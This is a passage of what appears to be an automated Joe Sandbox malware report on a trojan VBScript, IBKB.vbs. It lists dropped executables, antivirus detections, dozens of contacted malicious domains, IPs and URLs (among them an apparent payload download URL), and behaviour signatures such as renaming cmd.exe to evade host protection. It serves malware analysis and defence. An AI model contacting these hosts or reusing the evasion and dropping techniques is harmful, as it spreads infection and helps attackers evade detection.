52->87 dropped 167 Drops PE files to the user root directory 52->167 169 Drops PE files with a suspicious file extension 52->169 171 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 52->171 file17 signatures18 process19 signatures20 135 Loading BitLocker PowerShell Module 58->135 65 conhost.exe 58->65         started        67 WmiPrvSE.exe 58->67         started        137 Antivirus detection for dropped file 61->137 69 conhost.exe 63->69         started        process21

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      IBKB.vbs39%ReversingLabsScript-WScript.Trojan.Valyria
                      IBKB.vbs100%AviraVBS/Drop.Agent.VPYN

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\ACCApi\apihost.exe100%AviraTR/Dropper.Gen
                      C:\Users\user\AppData\Local\Temp\Native_neworigin.exe100%AviraW32/Patched.Ren.Gen
                      C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe100%AviraTR/Dropper.Gen
                      C:\Users\user\AppData\Local\Temp\Native_neworigin.exe100%Joe Sandbox ML
                      C:\Users\Public\Libraries\Juqmtmya.PIF100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\x.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe100%Joe Sandbox ML
                      C:\Users\Public\Libraries\aymtmquJ.pif3%ReversingLabs
                      C:\Users\Public\alpha.pif0%ReversingLabs

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      No Antivirus matches

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      oshhkdluh.biz
                      		54.244.188.177
                      		truetrue
                        jpskm.biz
                        		34.211.97.45
                        		truefalse
                          ftxlah.biz
                          		47.129.31.212
                          		truefalse
                            vjaxhpbji.biz
                            		82.112.184.197
                            		truetrue
                              pywolwnvd.biz
                              		54.244.188.177
                              		truetrue
                                s82.gocheapweb.com
                                		51.195.88.199
                                		truetrue
                                  ifsaia.biz
                                  		13.251.16.150
                                  		truefalse
                                    ytctnunms.biz
                                    		3.94.10.34
                                    		truefalse
                                      lrxdmhrr.biz
                                      		54.244.188.177
                                      		truetrue
                                        vrrazpdh.biz
                                        		34.211.97.45
                                        		truefalse
                                          tbjrpv.biz
                                          		34.246.200.160
                                          		truefalse
                                            jhvzpcfg.biz
                                            		44.221.84.105
                                            		truefalse
                                              saytjshyf.biz
                                              		44.221.84.105
                                              		truefalse
                                                xlfhhhm.biz
                                                		47.129.31.212
                                                		truefalse
                                                  fwiwk.biz
                                                  		172.234.222.143
                                                  		truefalse
                                                    typgfhb.biz
                                                    		13.251.16.150
                                                    		truefalse
                                                      npukfztj.biz
                                                      		44.221.84.105
                                                      		truefalse
                                                        esuzf.biz
                                                        		34.211.97.45
                                                        		truefalse
                                                          sxmiywsfv.biz
                                                          		13.251.16.150
                                                          		truefalse
                                                            przvgke.biz
                                                            		172.234.222.143
                                                            		truefalse
                                                              dwrqljrr.biz
                                                              		54.244.188.177
                                                              		truetrue
                                                                myups.biz
                                                                		165.160.15.20
                                                                		truefalse
                                                                  gytujflc.biz
                                                                  		208.100.26.245
                                                                  		truefalse
                                                                    yauexmxk.biz
                                                                    		18.208.156.248
                                                                    		truefalse
                                                                      gvijgjwkh.biz
                                                                      		3.94.10.34
                                                                      		truefalse
                                                                        ssbzmoy.biz
                                                                        		18.141.10.107
                                                                        		truefalse
                                                                          knjghuig.biz
                                                                          		18.141.10.107
                                                                          		truefalse
                                                                            yunalwv.biz
                                                                            		208.100.26.245
                                                                            		truefalse
                                                                              gnqgo.biz
                                                                              		18.208.156.248
                                                                              		truefalse
                                                                                deoci.biz
                                                                                		18.208.156.248
                                                                                		truefalse
                                                                                  brsua.biz
                                                                                  		3.254.94.185
                                                                                  		truefalse
                                                                                    iuzpxe.biz
                                                                                    		13.251.16.150
                                                                                    		truefalse
                                                                                      nqwjmb.biz
                                                                                      		35.164.78.200
                                                                                      		truefalse
                                                                                        wllvnzb.biz
                                                                                        		18.141.10.107
                                                                                        		truefalse
                                                                                          cvgrf.biz
                                                                                          		54.244.188.177
                                                                                          		truetrue
                                                                                            qaynky.biz
                                                                                            		13.251.16.150
                                                                                            		truefalse
                                                                                              lpuegx.biz
                                                                                              		82.112.184.197
                                                                                              		truetrue
                                                                                                gxe0.com
                                                                                                		198.252.105.91
                                                                                                		truefalse
                                                                                                  bumxkqgxu.biz
                                                                                                  		44.221.84.105
                                                                                                  		truefalse
                                                                                                    qpnczch.biz
                                                                                                    		18.246.231.120
                                                                                                    		truefalse
                                                                                                      api.ipify.org
                                                                                                      		172.67.74.152
                                                                                                      		truefalse
                                                                                                        vcddkls.biz
                                                                                                        		18.141.10.107
                                                                                                        		truefalse
                                                                                                          acwjcqqv.biz
                                                                                                          		18.141.10.107
                                                                                                          		truefalse
                                                                                                            vyome.biz
                                                                                                            		18.246.231.120
                                                                                                            		truefalse
                                                                                                              uhxqin.biz
                                                                                                              		unknown
                                                                                                              		unknowntrue
                                                                                                                anpmnmxo.biz
                                                                                                                		unknown
                                                                                                                		unknowntrue
                                                                                                                  zlenh.biz
                                                                                                                  		unknown
                                                                                                                  		unknowntrue
                                                                                                                    lejtdj.biz
                                                                                                                    		unknown
                                                                                                                    		unknowntrue

                                                                                                                      Contacted URLs

                                                                                                                      NameMaliciousAntivirus DetectionReputation
                                                                                                                      http://typgfhb.biz/rrrklmujfcwnchbfalse
                                                                                                                        http://fwiwk.biz/jwvwqanfysfalse
                                                                                                                          http://myups.biz/cfalse
                                                                                                                            http://przvgke.biz/aunxkpfalse
                                                                                                                              http://lpuegx.biz/bqdrapkxlqckatrue
                                                                                                                                http://cvgrf.biz/duhfjaeqhlnmwtntrue
                                                                                                                                  http://yunalwv.biz/xalserxgfalse
                                                                                                                                    http://knjghuig.biz/nsnnyufalse
                                                                                                                                      http://qaynky.biz/uiwlhtxrxipwfalse
                                                                                                                                        http://xlfhhhm.biz/mvnulpmrxwqefalse
                                                                                                                                          http://przvgke.biz/cbhxkefalse
                                                                                                                                            http://gytujflc.biz/rofptsppofgiwwfalse
                                                                                                                                              http://gvijgjwkh.biz/pggbsfikilutqofalse
                                                                                                                                                http://npukfztj.biz/dkglfbueemimxhfalse
                                                                                                                                                  http://lpuegx.biz/pfrxcitrue
                                                                                                                                                    http://lrxdmhrr.biz/wttrue
                                                                                                                                                      http://dwrqljrr.biz/sbnrqyxuvimudtrue
                                                                                                                                                        http://ssbzmoy.biz/clmhymdikmkfalse
                                                                                                                                                          http://lpuegx.biz/sqxjvguhdtdaciddtrue
                                                                                                                                                            http://pywolwnvd.biz/lcoyxsnwqtrue
                                                                                                                                                              http://npukfztj.biz/jofalse
                                                                                                                                                                http://knjghuig.biz/mwpifalse
                                                                                                                                                                  http://wllvnzb.biz/txsxcfalse
                                                                                                                                                                    http://saytjshyf.biz/qologlfowpsjwwtqfalse
                                                                                                                                                                      http://pywolwnvd.biz/cakchsrrlpkavtrue
                                                                                                                                                                        http://sxmiywsfv.biz/xwpgxegfalse
                                                                                                                                                                          http://cvgrf.biz/vtrue
                                                                                                                                                                            http://fwiwk.biz/oiqbeltfrlptsfalse
                                                                                                                                                                              http://ssbzmoy.biz/ctaniunjcxtafalse
                                                                                                                                                                                http://lpuegx.biz/epmanlipymtrue
                                                                                                                                                                                  http://deoci.biz/jlcfalse
                                                                                                                                                                                    http://przvgke.biz/fcknfalse
                                                                                                                                                                                      http://iuzpxe.biz/yngosjtjfalse
                                                                                                                                                                                        http://yauexmxk.biz/wdbsncfalse
                                                                                                                                                                                          http://przvgke.biz/krmiyakxtfalse
                                                                                                                                                                                            http://ssbzmoy.biz/kfhnfalse
                                                                                                                                                                                              http://vcddkls.biz/crfalse
                                                                                                                                                                                                http://cvgrf.biz/xkcbxhnrvtrue
                                                                                                                                                                                                  http://jhvzpcfg.biz/qehuuaxgtrfdfalse
                                                                                                                                                                                                    http://ftxlah.biz/hpplfalse
                                                                                                                                                                                                      http://przvgke.biz/kscfalse
                                                                                                                                                                                                        http://gytujflc.biz/iqfalse
                                                                                                                                                                                                          http://acwjcqqv.biz/srktyhawgjwbfalse
                                                                                                                                                                                                            http://nqwjmb.biz/sfalse
                                                                                                                                                                                                              http://myups.biz/rjreynucnxubyanfalse
                                                                                                                                                                                                                https://gxe0.com/yak2/233_Juqmtmyadyyfalse
                                                                                                                                                                                                                  https://api.ipify.org/false
                                                                                                                                                                                                                    http://vjaxhpbji.biz/mshkatrue
                                                                                                                                                                                                                      http://ifsaia.biz/ueaceffalse
                                                                                                                                                                                                                        http://przvgke.biz/xyttxtxgffalse
                                                                                                                                                                                                                          http://oshhkdluh.biz/rsqlwjdrwktrue
                                                                                                                                                                                                                            http://vjaxhpbji.biz/gatrue
                                                                                                                                                                                                                              http://pywolwnvd.biz/vfpepibjtutrue
                                                                                                                                                                                                                                http://knjghuig.biz/hfalse
                                                                                                                                                                                                                                  http://ytctnunms.biz/qklrfalse
                                                                                                                                                                                                                                    http://npukfztj.biz/khahgpofalse

                                                                                                                                                                                                                                      URLs from Memory and Binaries

                                                                                                                                                                                                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                                      http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          http://82.112.184.197/JNative_neworigin.exe, 00000009.00000002.2431438104.0000000006990000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            https://aka.ms/pscore6lBpowershell.exe, 0000000B.00000002.2523044269.00000000051C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              https://nuget.org/nuget.exepowershell.exe, 0000000B.00000002.2613552915.0000000006226000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                http://172.234.222.143/kscNative_neworigin.exe, 00000009.00000002.2397017499.000000000090A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNative_neworigin.exe, 00000009.00000002.2398313780.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2523044269.00000000051C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    https://account.dyn.com/Native_neworigin.exe, 00000009.00000002.2398313780.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.2523044269.0000000005311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000B.00000002.2523044269.0000000005311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.2523044269.0000000005311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                            http://82.112.184.197/$Native_neworigin.exe, 00000009.00000002.2403789034.000000000518F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              https://contoso.com/Iconpowershell.exe, 0000000B.00000002.2613552915.0000000006226000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                https://api.ipify.org/tNative_neworigin.exe, 00000009.00000002.2398313780.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.2523044269.0000000005311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    http://18.141.10.107/nsnnyuNative_neworigin.exe, 00000013.00000002.2586371750.0000000006234000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                      http://r11.i.lencr.org/0Native_neworigin.exe, 00000009.00000002.2403789034.000000000518F000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2398313780.0000000003049000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2431438104.00000000069B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                        http://crl.micropowershell.exe, 0000000B.00000002.2471994453.0000000003527000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000B.00000002.2523044269.0000000005311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                            http://s82.gocheapweb.comNative_neworigin.exe, 00000009.00000002.2398313780.0000000003041000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                              http://www.pmail.comx.exe, x.exe, 00000002.00000002.2336563661.00000000224E2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2275324060.0000000020B62000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2070075040.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000002.2275324060.0000000020A90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2323160044.000000002217C000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000002.2434873297.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2323160044.000000002211E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000003.2070521735.000000007F920000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2191785418.0000000002C20000.00000004.00000020.00020000.00000000.sdmp, aymtmquJ.pif, 00000008.00000000.2159641261.0000000000416000.00000002.00000001.01000000.00000008.sdmp, Juqmtmya.PIF, 00000010.00000002.2348684542.0000000002D62000.00000004.00001000.00020000.00000000.sdmp, aymtmquJ.pif, 00000011.00000000.2324949898.0000000000416000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                                                                                                                                                                                http://ocsp.sectigo.com0Cx.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                  http://82.112.184.197/epmanlipymNative_neworigin.exe, 00000009.00000002.2431438104.0000000006990000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                    https://gxe0.com/yak2/233_Juqmtmyadyycx.exe, 00000002.00000002.2165746672.00000000007BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                      http://ocsp.sectigo.com0x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                        https://contoso.com/Licensepowershell.exe, 0000000B.00000002.2613552915.0000000006226000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                          http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                            http://54.244.188.177/QmKPNative_neworigin.exe, 00000013.00000002.2586371750.0000000006234000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                              http://18.141.10.107/Native_neworigin.exe, 00000013.00000002.2586371750.0000000006234000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                https://api.ipify.orgNative_neworigin.exe, 00000009.00000002.2398313780.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                  http://crl.verisNative_neworigin.exe, 00000009.00000002.2403789034.00000000051E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                    http://x1.c.lencr.org/0Native_neworigin.exe, 00000009.00000002.2403789034.000000000518F000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2398313780.0000000003049000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2431438104.00000000069B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                      http://x1.i.lencr.org/0Native_neworigin.exe, 00000009.00000002.2403789034.000000000518F000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2398313780.0000000003049000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2431438104.00000000069B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                        https://contoso.com/powershell.exe, 0000000B.00000002.2613552915.0000000006226000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                          http://44.221.84.105/joNative_neworigin.exe, 00000009.00000002.2403789034.0000000005169000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                            http://54.244.188.177/Native_neworigin.exe, 00000013.00000002.2586371750.0000000006234000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                              http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                http://nuget.org/NuGet.exepowershell.exe, 0000000B.00000002.2613552915.0000000006226000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                  https://gxe0.com/yak2/233_Juqmtmx.exe, 00000002.00000002.2275324060.0000000020B9D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                    https://sectigo.com/CPS0x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                      http://r11.o.lencr.org0#Native_neworigin.exe, 00000009.00000002.2403789034.000000000518F000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2398313780.0000000003049000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2431438104.00000000069B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                        https://gxe0.com:443/yak2/233_Juqmtmyadyyx.exe, 00000002.00000002.2165746672.00000000007F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                          https://gxe0.com/x.exe, 00000002.00000002.2165746672.00000000007D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                            http://82.112.184.197:80/epmanlipymyNative_neworigin.exe, 00000009.00000002.2403789034.000000000518F000.00000004.00000020.00020000.00000000.sdmpfalse

                                                                                                                                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                                                                              165.160.15.20
                                                                                                                                                                                                                                                                                                                              		myups.bizUnited States
                                                                                                                                                                                                                                                                                                                              		19574CSCUSfalse
                                                                                                                                                                                                                                                                                                                              3.94.10.34
                                                                                                                                                                                                                                                                                                                              		ytctnunms.bizUnited States
                                                                                                                                                                                                                                                                                                                              		14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                              34.246.200.160
                                                                                                                                                                                                                                                                                                                              		tbjrpv.bizUnited States
                                                                                                                                                                                                                                                                                                                              		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                              198.252.105.91
                                                                                                                                                                                                                                                                                                                              		gxe0.comCanada
                                                                                                                                                                                                                                                                                                                              		20068HAWKHOSTCAfalse
                                                                                                                                                                                                                                                                                                                              172.234.222.143
                                                                                                                                                                                                                                                                                                                              		fwiwk.bizUnited States
                                                                                                                                                                                                                                                                                                                              		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                                                                                              18.208.156.248
                                                                                                                                                                                                                                                                                                                              		yauexmxk.bizUnited States
                                                                                                                                                                                                                                                                                                                              		14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                              208.100.26.245
                                                                                                                                                                                                                                                                                                                              		gytujflc.bizUnited States
                                                                                                                                                                                                                                                                                                                              		32748STEADFASTUSfalse
                                                                                                                                                                                                                                                                                                                              35.164.78.200
                                                                                                                                                                                                                                                                                                                              		nqwjmb.bizUnited States
                                                                                                                                                                                                                                                                                                                              		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                              172.234.222.138
                                                                                                                                                                                                                                                                                                                              		unknownUnited States
                                                                                                                                                                                                                                                                                                                              		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                                                                                              51.195.88.199
                                                                                                                                                                                                                                                                                                                              		s82.gocheapweb.comFrance
                                                                                                                                                                                                                                                                                                                              		16276OVHFRtrue
                                                                                                                                                                                                                                                                                                                              44.221.84.105
                                                                                                                                                                                                                                                                                                                              		jhvzpcfg.bizUnited States
                                                                                                                                                                                                                                                                                                                              		14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                              54.244.188.177
                                                                                                                                                                                                                                                                                                                              		oshhkdluh.bizUnited States
                                                                                                                                                                                                                                                                                                                              		16509AMAZON-02UStrue
                                                                                                                                                                                                                                                                                                                              13.251.16.150
                                                                                                                                                                                                                                                                                                                              		ifsaia.bizUnited States
                                                                                                                                                                                                                                                                                                                              		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                              47.129.31.212
                                                                                                                                                                                                                                                                                                                              		ftxlah.bizCanada
                                                                                                                                                                                                                                                                                                                              		34533ESAMARA-ASRUfalse
                                                                                                                                                                                                                                                                                                                              82.112.184.197
                                                                                                                                                                                                                                                                                                                              		vjaxhpbji.bizRussian Federation
                                                                                                                                                                                                                                                                                                                              		43267FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRUtrue
                                                                                                                                                                                                                                                                                                                              18.141.10.107
                                                                                                                                                                                                                                                                                                                              		ssbzmoy.bizUnited States
                                                                                                                                                                                                                                                                                                                              		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                              172.67.74.152
                                                                                                                                                                                                                                                                                                                              		api.ipify.orgUnited States
                                                                                                                                                                                                                                                                                                                              		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                                                                                                                                                              General Information

                                                                                                                                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                                                                                              Analysis ID:1559226
                                                                                                                                                                                                                                                                                                                              Start date and time:2024-11-20 10:23:37 +01:00
                                                                                                                                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                                                                                              Overall analysis duration:0h 13m 40s
                                                                                                                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                                                                                              Number of analysed new started processes analysed:28
                                                                                                                                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                                                                                                                              Sample name:IBKB.vbs
                                                                                                                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                                                                                                                              Classification:mal100.troj.spyw.expl.evad.winVBS@41/22@69/17
                                                                                                                                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                                                                                                                                              • Successful, ratio: 66.7%
                                                                                                                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                                                                                                                              • Successful, ratio: 90%
                                                                                                                                                                                                                                                                                                                              • Number of executed functions: 222
                                                                                                                                                                                                                                                                                                                              • Number of non-executed functions: 80
                                                                                                                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                                                                                                                              • Found application associated with file extension: .vbs

                                                                                                                                                                                                                                                                                                                              Warnings

                                                                                                                                                                                                                                                                                                                              • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                                                                                                              • Execution Graph export aborted for target Trading_AIBot.exe, PID 6544 because it is empty
                                                                                                                                                                                                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 1532 because it is empty
                                                                                                                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                                                              • VT rate limit hit for: IBKB.vbs

                                                                                                                                                                                                                                                                                                                              Simulations

                                                                                                                                                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                                                                                                                                              04:24:32API Interceptor2x Sleep call for process: x.exe modified
                                                                                                                                                                                                                                                                                                                              04:24:49API Interceptor11414x Sleep call for process: Native_neworigin.exe modified
                                                                                                                                                                                                                                                                                                                              04:24:49API Interceptor21x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                                                                                                              04:24:56API Interceptor2x Sleep call for process: Juqmtmya.PIF modified
